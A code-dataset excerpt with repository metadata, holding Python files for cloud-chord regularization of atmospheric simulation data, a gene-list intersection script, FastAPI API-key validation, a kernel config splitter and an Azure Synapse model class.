if t_chord_end-t_chord_begin>cell_min-1:
n_chords += 1
#chord_idx_list.append(list(cbl_cl_idx[t_chord_begin:t_cloudy_idx]))
#Here we start the interpolation stuff
#Getting the chord beginning and end
idx_beg_chord = cbl_cl_idx[t_chord_begin]
idx_end_chord = cbl_cl_idx[t_chord_end]
time_beg_chord = t_1d[idx_beg_chord]
time_end_chord = t_1d[idx_end_chord]
#Calculate the beginning and end of the curtain, we add a bit to to each side to make interpolation easy
idx_beg_curtain = (np.abs(t_1d - (time_beg_chord-curtain_extra*(time_end_chord-time_beg_chord)))).argmin()-1
idx_end_curtain = (np.abs(t_1d - (time_end_chord+curtain_extra*(time_end_chord-time_beg_chord)))).argmin()+2
idx_end_curtain = min(idx_end_curtain,nt-1)
time_beg_curtain = t_1d[idx_beg_curtain]
time_end_curtain = t_1d[idx_end_curtain]
chord_cells = t_chord_end-t_chord_begin
curtain_cells = idx_end_curtain-idx_beg_curtain
#If curtain has more than curtain_min cells and curtain tail noes not extend beyond end of 2d field or the beginning extend before
#I added 2 cells buffer at the beginning and end, because for the interpolation a bit of overlap is used.
if idx_end_curtain<nt-2 and idx_beg_curtain>2 and len(cbl_cl_idx[t_chord_begin:t_chord_end])>curtain_min-1:
n_curtain += 1
#First thing to do is calculate the chord base using the 25 percentile in agreement with Neil
z_idx_base_default = math.floor(np.percentile(cl_base[cbl_cl_idx[t_chord_begin:t_cloudy_idx]],base_percentile))
#Regularized curtains, I am too lazy to pass on all my variables to func_curtain_reg so I instead made it a nested function
var_curtain_tmp = (func_curtain_reg(var_2d)).transpose()
if boundary_scaling_flag == 1:
#Now adding the boundary scaling using w*
surf_flux = np.mean(bflux_s_1d[idx_beg_chord:idx_end_chord])
base_height = z_idx_base_default*dz
w_star=(base_height*surf_flux)**(1/3)
if reg_var=='w':
boundary_scaling = w_star
if reg_var=='qt':
surf_flux = np.mean(qtflux_s_1d[idx_beg_chord:idx_end_chord])
boundary_scaling = surf_flux/w_star
if reg_var=='thl':
thl_flux = np.mean(thlflux_s_1d[idx_beg_chord:idx_end_chord])
boundary_scaling = surf_flux/w_star
var_curtain_tmp = var_curtain_tmp/boundary_scaling
#Finally add it to the mean one and track one more curtain
#detecting if chord base has a positive or negative w, then adds to the sum of up or downdraft chords
w_tmp = w_2d[cl_base[cbl_cl_idx[t_chord_begin:t_cloudy_idx]]-1,cbl_cl_idx[t_chord_begin:t_chord_end]]
#print(w_tmp)
#Scaling is now added here,
#Things are applied twice so that deviding by n it comes out fin
#We assume here that n_x and n_y are roughly same
#Could be made cleaner later on
if scale_flag>0 and data_dim_flag==3:
if scale_flag==1:
#find out if we need scaling_factor_x or y by seeing if we are in the first or second half
if idx_end_curtain<nt/2:
scaling_factor = 2*scaling_factor_x
else:
scaling_factor = 2*scaling_factor_y
if scaling_factor>0:
var_curtain_tmp = var_curtain_tmp[::-1,:]
var_curtain_tmp = abs(scaling_factor) * var_curtain_tmp
if scale_flag==2:
if idx_end_curtain<nt/2:
scaling_factor_prof = 2*scaling_factor_x_inter
else:
scaling_factor_prof = 2*scaling_factor_y_inter
for n_prof in range(scaling_factor_prof.shape[0]):
if scaling_factor_prof[n_prof]>0:
var_curtain_tmp[:,n_prof] = var_curtain_tmp[::-1,n_prof]
var_curtain_tmp [:,n_prof]= abs(scaling_factor_prof[n_prof])*var_curtain_tmp[:,n_prof]
#Now adding the var_curtain_tmp to the sums
var_curtain_sum = var_curtain_sum+var_curtain_tmp
if np.mean(w_tmp)>0.:
n_curtain_up += 1
var_curtain_up_sum += var_curtain_tmp
elif np.mean(w_tmp)<0.:
n_curtain_dw += 1
var_curtain_dw_sum += var_curtain_tmp
else:
print('wtf how is this zero: ',np.mean(w_tmp),w_tmp)
#globals().update(locals())
###############################################################################################################################################
################## SIZE BINNING ##############################################################################################################
###############################################################################################################################################
if size_bin_flag:
#getting V_ref if data_dim_flag==1. Is calculated directly from the cloud base speeds
if data_dim_flag==1:
ch_idx_l = list(cbl_cl_idx[t_chord_begin:t_chord_end])
u_ref=np.mean(u_2d[cl_base[ch_idx_l],ch_idx_l])
v_ref=np.mean(v_2d[cl_base[ch_idx_l],ch_idx_l])
V_ref=np.sqrt(u_ref**2+v_ref**2)
ch_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
chord_length = ch_duration*V_ref
#if scale_flag==0:
# scaling_factor=1.
#find index of bin close to mid size bin
bin_idx = np.where(np.abs(chord_length-mid_bin_size)<125)[0]
if bin_idx.size>0:
#print('bin_idx,chord_length',bin_idx,chord_length)
n_curtain_bin[bin_idx] += 1
var_curtain_bin_sum[bin_idx,:,:] = var_curtain_bin_sum[bin_idx,:,:] + var_curtain_tmp
if np.mean(w_tmp)>0.:
n_curtain_bin_up[bin_idx] += 1
var_curtain_bin_up_sum[bin_idx,:,:] += var_curtain_tmp
elif np.mean(w_tmp)<0.:
n_curtain_bin_dw[bin_idx] += 1
var_curtain_bin_dw_sum[bin_idx,:,:] += var_curtain_tmp
else:
print('wtf how is this zero: ',np.mean(w_tmp),w_tmp)
##############################################################################################################################
#PLOTS
##############################################################################################################################
#If the plot flag is set the pre regularization curtains are plotted.
if plot_curtains_flag ==1:
print('plotting not implemented yet')
##############################################################################################################################
#switching to y direction if half of max chords reached
##############################################################################################################################
if n_chords == int(chord_max/2):
t_cloudy_idx = int(len(cbl_cl_idx)/2)
t_cloudy_idx += 1
time3 = ttiimmee.time()
print('curtain processing:',(time3-time2)/60.0,'minutes')
print(':')
print(':')
print(':')
time_end = ttiimmee.time()
print('total run time of proc_beard_regularize in minutes: ',(time_end-time_begin)/60.)
print(':')
print(':')
print(':')
#Replacing saving with xarray
xr_dataset = xr.Dataset(
data_vars = {reg_var :(('regularized height', 'regularized time'), var_curtain_sum.transpose()/n_curtain),
reg_var+'_up':(('regularized height', 'regularized time'), var_curtain_up_sum.transpose()/n_curtain_up),
reg_var+'_dw':(('regularized height', 'regularized time'), var_curtain_dw_sum.transpose()/n_curtain_dw)},
coords={'regularized time':t_reg_mid, 'regularized height':z_reg_mid})
xr_dataset[reg_var].attrs['n']=n_curtain
xr_dataset[reg_var+'_up'].attrs['n']=n_curtain_up
xr_dataset[reg_var+'_dw'].attrs['n']=n_curtain_dw
xr_dataset.attrs = settings_dict
#Making save string
save_string_base = '_beard_'+date+'_d'+str(data_dim_flag)+'_cb'+str(base_smoothing_flag)+'_an'+str(anomaly_flag)+'_ct'+str(chord_times)+'_ce'+str(int(curtain_extra))
if data_dim_flag==3:
save_string_base = save_string_base+'_sf'+str(scale_flag)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
if boundary_scaling_flag==1:
save_string_base = 'star'+save_string_base
save_string_base = save_string_base+'_'+special_name+'_N'+str(n_curtain)
save_string = directory_output+ reg_var+save_string_base +'.nc'
xr_dataset.to_netcdf(save_string)
print('saved beard data to '+save_string)
if size_bin_flag==1:
xr_dataset = xr.Dataset(
data_vars = {reg_var :(('regularized height', 'regularized time','length'), var_curtain_bin_sum.transpose()/n_curtain_bin),
reg_var+'_up':(('regularized height', 'regularized time','length'), var_curtain_bin_up_sum.transpose()/n_curtain_bin_up),
reg_var+'_dw':(('regularized height', 'regularized time','length'), var_curtain_bin_dw_sum.transpose()/n_curtain_bin_dw)},
coords={'regularized time':t_reg_mid, 'regularized height':z_reg_mid, 'length':mid_bin_size})
xr_dataset[reg_var].attrs['n'] =n_curtain_bin
xr_dataset[reg_var+'_up'].attrs['n'] =n_curtain_bin_up
xr_dataset[reg_var+'_dw'].attrs['n'] =n_curtain_bin_dw
xr_dataset.attrs = settings_dict
save_string = directory_output+ reg_var+save_string_base+'_sizebin.nc'
xr_dataset.to_netcdf(save_string)
print('saved size binned beards to '+save_string)
print(':')
print(':')
print(':')
print(':')
print(':')
return
#A simple script which calculates a histogram below the cloud base and saves it
#I will try to keep it at least somewhat general with a flexible variable
def proc_pdf(reg_var = 'w',
date_str='20160611',
directory_input ='/data/testbed/lasso/sims/',
directory_output ='data_pdfs/',
data_dim_flag=3,
special_name='',
N_it_max=1e9,
N_it_min=0,
anomaly_flag =0,
N_bins=400,
base_percentile = 25,
boundary_scaling_flag = 1,
range_var = [-10,10] ):
#We are starting out with histograms of w from -10 to 10 and a 0.1 spacing
var_hist_sum=np.zeros(N_bins)
date = date_str
#value used to determine existence of cloud
ql_min = 1e-5
z_min = 10 #Index of minimum z_vlvl of the cbl
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*.column.*.*.*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
#getting variable to be regularized
filename_var = directory_input+date+'/'+reg_var+'.nc'
file_var = Dataset(filename_var,read='r')
filename_prof=glob.glob(directory_input+date+'/testbed?default?0*.nc')[0]
#filename_prof=directory_input+date+'/testbed.default.0000000.nc'
if date=='bomex':
filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
extra_string = ''
#This now a bit trickier then for the 3D version. Will have to calculate a vector for the lower time resolution of the profile,
#Then latter apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
nz_prof = w2.shape[1]
var_prof = file_prof[reg_var][:,:] #needed for anomaly processing
#Just grabbing this to calculate dz
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
print('dz: ',dz)
#for boundary scaling
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
#Mimimum of LCL +100 or variance plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
print('warning, cbl height heigher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it],read='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
print('t_1d',t_1d)
#Load the var file, even if means that we doable load w_2d or ql_2d
var_2d = file_col.variables[reg_var][:]
var_2d = var_2d.transpose()
#The needed cbl height
cbl_1d = t_1d*0
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d= t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
#to get anomalies we subtract the closet mean profile
if anomaly_flag==1:
for tt in range(len(time_prof)):
tmp_matrix = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = var_prof[tt,:]
#because the vectors don't perfectly align
var_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
var_3d = grab_3d_field(file_var ,it,reg_var)
#Here we have to do all the fuckery to turn the 3D fields into 2d slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
var_2d = np.array(var_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field, use to be an either or, now just add it on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
var_3d = np.transpose(var_3d, (0, 2, 1))
#globals().update(locals())
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
var_2d = np.hstack([var_2d ,np.array(var_3d.reshape((nz,nx*ny)))])
#This might save a bit of memory
if reg_var == 'w':
var_2d = w_2d
if reg_var == 'ql':
var_2d = ql_2d
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del var_3d
gc.collect()
#fake t vector,
t_1d = np.linspace(0,2*nx*ny,2*nx*ny)
#Switching to anomalies if anomaly flag is used
if anomaly_flag==1:
#because the vectors don't perfectly align
var_2d[:,:] = (var_2d.transpose() - var_prof[it,:]).transpose()
#to get the fake time vector we load the wind from the profile data, which devided by the grid spacing gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
else:
#If no clouds are present we pass a very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
var_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
#Use to have a different method using nans that doesn:t work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>ql_min)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
#Now find c base lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
if len(cbl_cl_idx)>0:
#Now calculating the var at cloud base
var_cl_base=var_2d[cl_base[cbl_cl_idx]-1,cbl_cl_idx]
#If boundary scaling is used, the variable is scaled accordingly
#Only called if there are any clouds
if boundary_scaling_flag == 1 and len(cbl_cl_idx)>1:
#First thing to do is calculate the chord base using the 25 percentile in agreement with Neil
if data_dim_flag==3:
z_idx_base_default = math.floor(np.percentile(cl_base[cbl_cl_idx],base_percentile))
# Can't think of a good way to do this, will throw up an error for the mean time.
if data_dim_flag==1:
print('sorry, but I havent implemented star scaling for 1d data')
sys.exit()
#Now adding the boundary scaling using w*
#Is a bit overcooked currently as it only works with 3D data and thus all surface fluxes are the same everywhere.
surf_flux = np.mean(bflux_s_1d)
base_height = z_idx_base_default*dz
w_star=(base_height*surf_flux)**(1/3)
if reg_var=='w':
boundary_scaling = w_star
if reg_var=='qt':
surf_flux = np.mean(qtflux_s_1d)
boundary_scaling = surf_flux/w_star
if reg_var=='thl':
thl_flux = np.mean(thlflux_s_1d)
boundary_scaling = surf_flux/w_star
var_cl_base = var_cl_base/boundary_scaling
#Calculating the histogram, and adding it to the total histogram
var_hist,bin_edges = np.histogram(var_cl_base,range=range_var,bins=N_bins)
var_hist_sum = var_hist_sum+var_hist
else:
print('no cloudy columns apparently')
var_pdf = var_hist_sum
save_string_base = '_pdf_'+date+'_d'+str(data_dim_flag)+'_an'+str(anomaly_flag)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
if boundary_scaling_flag==1:
save_string_base = 'star'+save_string_base
save_string = directory_output+ reg_var+save_string_base
save_string = save_string+'.npz'
np.savez(save_string,var_pdf=var_pdf,range_var=range_var)
print('saved pdf with ', sum(var_pdf), 'points to '+save_string)
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
return
| 40.605882
| 218
| 0.563326
| 10,852
| 75,933
| 3.660892
| 0.074825
| 0.00589
| 0.011352
| 0.009817
| 0.702376
| 0.657874
| 0.624547
| 0.607858
| 0.584122
| 0.56474
| 0
| 0.030185
| 0.334663
| 75,933
| 1,869
| 219
| 40.627608
| 0.756181
| 0.252841
| 0
| 0.641026
| 0
| 0
| 0.058283
| 0.003896
| 0
| 0
| 0
| 0.000535
| 0
| 1
| 0.003945
| false
| 0
| 0.013807
| 0
| 0.021696
| 0.100592
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5ce012afb2ebb7c4522ad96e38d4259432b472d
| 1,656
|
py
|
Python
|
expression-atlas-wf/scripts/dmel_tau_housekeeping.py
|
jfear/larval_gonad
|
624a71741864b74e0372f89bdcca578e5cca3722
|
[
"MIT"
] | 1
|
2019-09-13T13:24:18.000Z
|
2019-09-13T13:24:18.000Z
|
expression-atlas-wf/scripts/dmel_tau_housekeeping.py
|
jfear/larval_gonad
|
624a71741864b74e0372f89bdcca578e5cca3722
|
[
"MIT"
] | 65
|
2019-07-24T16:23:08.000Z
|
2020-03-06T22:18:47.000Z
|
expression-atlas-wf/scripts/dmel_tau_housekeeping.py
|
jfear/larval_gonad
|
624a71741864b74e0372f89bdcca578e5cca3722
|
[
"MIT"
] | 1
|
2021-06-02T19:09:35.000Z
|
2021-06-02T19:09:35.000Z
|
"""D. mel housekeeping genes based on tau.
Uses the intersection of w1118 and orgR to create a list of
D. mel housekeeping genes.
"""
import os
from functools import partial
import pandas as pd
from larval_gonad.io import pickle_load, pickle_dump
def main():
# Load mapping of YOgn to FBgn
annot = pickle_load(snakemake.input.annot[0])
pickle_dump(intersect_fbgns(snakemake.input.male, annot), snakemake.output.male)
pickle_dump(intersect_fbgns(snakemake.input.female, annot), snakemake.output.female)
def intersect_fbgns(file_names, annot):
return list(set.intersection(*list(map(partial(convert_to_fbgn, annot=annot), file_names))))
def convert_to_fbgn(file_name, annot):
return set(
[
fbgn
for fbgn in map(lambda x: annot.get(x, None), pickle_load(file_name))
if fbgn is not None
]
)
if __name__ == "__main__":
if os.getenv("SNAKE_DEBUG", False):
from larval_gonad.debug import snakemake_debug
snakemake = snakemake_debug(
workdir="expression-atlas-wf",
input=dict(
male=[
"../output/expression-atlas-wf/tau_housekeeping/w1118_male.pkl",
"../output/expression-atlas-wf/tau_housekeeping/orgR_male.pkl",
],
female=[
"../output/expression-atlas-wf/tau_housekeeping/w1118_female.pkl",
"../output/expression-atlas-wf/tau_housekeeping/orgR_female.pkl",
],
annot="../output/expression-atlas-wf/YOgn_to_dmel_ortholog/dmel.pkl",
),
)
main()
| 30.109091
| 96
| 0.630435
| 203
| 1,656
| 4.940887
| 0.364532
| 0.089731
| 0.101695
| 0.114656
| 0.251246
| 0.251246
| 0.175474
| 0.089731
| 0
| 0
| 0
| 0.010647
| 0.262681
| 1,656
| 54
| 97
| 30.666667
| 0.810811
| 0.094807
| 0
| 0.055556
| 0
| 0
| 0.230563
| 0.205094
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.138889
| 0.055556
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5ce93a21169fedfe3df6edeca6f8d5d29633b0f
| 2,226
|
py
|
Python
|
api-server/server/core/key.py
|
TK-IBM-Call-for-Code-Challange-2021/call-for-code-challenge-2021
|
7a3d78d4067303d61c4a25d45c0671ae7e984222
|
[
"MIT"
] | 75
|
2020-07-22T15:24:56.000Z
|
2022-03-30T08:34:06.000Z
|
api-server/server/core/key.py
|
TK-IBM-Call-for-Code-Challange-2021/call-for-code-challenge-2021
|
7a3d78d4067303d61c4a25d45c0671ae7e984222
|
[
"MIT"
] | null | null | null |
api-server/server/core/key.py
|
TK-IBM-Call-for-Code-Challange-2021/call-for-code-challenge-2021
|
7a3d78d4067303d61c4a25d45c0671ae7e984222
|
[
"MIT"
] | 34
|
2020-07-23T02:54:03.000Z
|
2022-03-29T09:51:21.000Z
|
"""
Api Key validation
"""
from typing import Optional
from fastapi.security.api_key import APIKeyHeader
from fastapi import HTTPException, Security, Depends
from starlette.status import HTTP_401_UNAUTHORIZED, HTTP_400_BAD_REQUEST, HTTP_403_FORBIDDEN
from server.core.security import verify_key
from server.db.mongodb import AsyncIOMotorClient, get_database
from server.models.user import User
from server.db.crud.user import get_user_by_email
from pydantic import EmailStr
api_key_scheme = APIKeyHeader(name="X-API-KEY", auto_error=False)
email_scheme = APIKeyHeader(name="X-EMAIL-ID", auto_error=False)
async def validate_request(
api_key: Optional[str] = Security(api_key_scheme),
email_id: Optional[EmailStr] = Security(email_scheme),
db: AsyncIOMotorClient = Depends(get_database)
) -> Optional[User]:
"""Validate a request with given email and api key
to any endpoint resource
"""
if api_key is None:
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="X-API-KEY is missing", headers={}
)
if email_id is None:
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="X-EMAIL-ID is missing", headers={}
)
user = await get_user_by_email(db, email_id)
# verify email & API key
if user:
api_key = str(user.salt) + str(api_key)
if not verify_key(api_key, user.hashed_api_key):
# api key mismatch
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED, detail="Access not allowed", headers={}
)
if user.disabled:
# disabled user
raise HTTPException(
status_code=HTTP_403_FORBIDDEN, detail="User is disabled", headers={}
)
if not user.is_active:
# user's email is not verified
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED, detail="Email not verified", headers={}
)
# All verified
return User(**user.dict())
else:
# not a valid email provided
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="Unknown Email", headers={}
)
| 33.223881
| 92
| 0.666667
| 281
| 2,226
| 5.071174
| 0.291815
| 0.063158
| 0.101053
| 0.117895
| 0.214035
| 0.191579
| 0.191579
| 0.191579
| 0.117193
| 0.081404
| 0
| 0.016197
| 0.251123
| 2,226
| 66
| 93
| 33.727273
| 0.838632
| 0.063792
| 0
| 0.136364
| 0
| 0
| 0.063004
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.204545
| 0
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5cee84d7663e55b77b23428667b37ccfb80fbf9
| 1,253
|
py
|
Python
|
scripts/kconfig-split.py
|
Osirium/linuxkit
|
b710224cdf9a8425a7129cdcb84fc1af00f926d7
|
[
"Apache-2.0"
] | 7,798
|
2017-04-18T15:19:24.000Z
|
2022-03-30T19:34:42.000Z
|
scripts/kconfig-split.py
|
Osirium/linuxkit
|
b710224cdf9a8425a7129cdcb84fc1af00f926d7
|
[
"Apache-2.0"
] | 1,673
|
2017-04-18T16:15:20.000Z
|
2022-03-31T06:14:17.000Z
|
scripts/kconfig-split.py
|
Osirium/linuxkit
|
b710224cdf9a8425a7129cdcb84fc1af00f926d7
|
[
"Apache-2.0"
] | 1,099
|
2017-04-18T15:19:33.000Z
|
2022-03-31T20:23:20.000Z
|
#!/usr/bin/env python
# This is a slightly modified version of ChromiumOS' splitconfig
# https://chromium.googlesource.com/chromiumos/third_party/kernel/+/stabilize-5899.B-chromeos-3.14/chromeos/scripts/splitconfig
"""See this page for more details:
http://dev.chromium.org/chromium-os/how-tos-and-troubleshooting/kernel-configuration
"""
import os
import re
import sys
allconfigs = {}
# Parse config files
for config in sys.argv[1:]:
allconfigs[config] = set()
for line in open(config):
m = re.match("#*\s*CONFIG_(\w+)[\s=](.*)$", line)
if not m:
continue
option, value = m.groups()
allconfigs[config].add((option, value))
# Split out common config options
common = allconfigs.values()[0].copy()
for config in allconfigs.keys():
common &= allconfigs[config]
for config in allconfigs.keys():
allconfigs[config] -= common
allconfigs["common"] = common
# Generate new splitconfigs
for config in allconfigs.keys():
f = open("split-" + config, "w")
for option, value in sorted(list(allconfigs[config])):
if value == "is not set":
print >>f, "# CONFIG_%s %s" % (option, value)
else:
print >>f, "CONFIG_%s=%s" % (option, value)
f.close()
| 27.844444
| 127
| 0.651237
| 165
| 1,253
| 4.921212
| 0.49697
| 0.098522
| 0.054187
| 0.077586
| 0.153941
| 0.061576
| 0.061576
| 0
| 0
| 0
| 0
| 0.008955
| 0.197925
| 1,253
| 44
| 128
| 28.477273
| 0.799005
| 0.321628
| 0
| 0.115385
| 0
| 0
| 0.090692
| 0.03222
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.115385
| 0
| 0.115385
| 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5cef9720c8cb2b94870da749da3f4cf31757f01
| 1,631
|
py
|
Python
|
src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_statement_output.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 2
|
2021-06-05T17:51:26.000Z
|
2021-11-17T11:17:56.000Z
|
src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_statement_output.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 3
|
2020-05-27T20:16:26.000Z
|
2020-07-23T19:46:49.000Z
|
src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_statement_output.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 5
|
2020-05-09T17:47:09.000Z
|
2020-10-01T19:52:06.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LivyStatementOutput(Model):
"""LivyStatementOutput.
:param status:
:type status: str
:param execution_count:
:type execution_count: int
:param data:
:type data: object
:param ename:
:type ename: str
:param evalue:
:type evalue: str
:param traceback:
:type traceback: list[str]
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'execution_count': {'key': 'execution_count', 'type': 'int'},
'data': {'key': 'data', 'type': 'object'},
'ename': {'key': 'ename', 'type': 'str'},
'evalue': {'key': 'evalue', 'type': 'str'},
'traceback': {'key': 'traceback', 'type': '[str]'},
}
def __init__(self, **kwargs):
super(LivyStatementOutput, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.execution_count = kwargs.get('execution_count', None)
self.data = kwargs.get('data', None)
self.ename = kwargs.get('ename', None)
self.evalue = kwargs.get('evalue', None)
self.traceback = kwargs.get('traceback', None)
| 33.285714
| 76
| 0.563458
| 170
| 1,631
| 5.311765
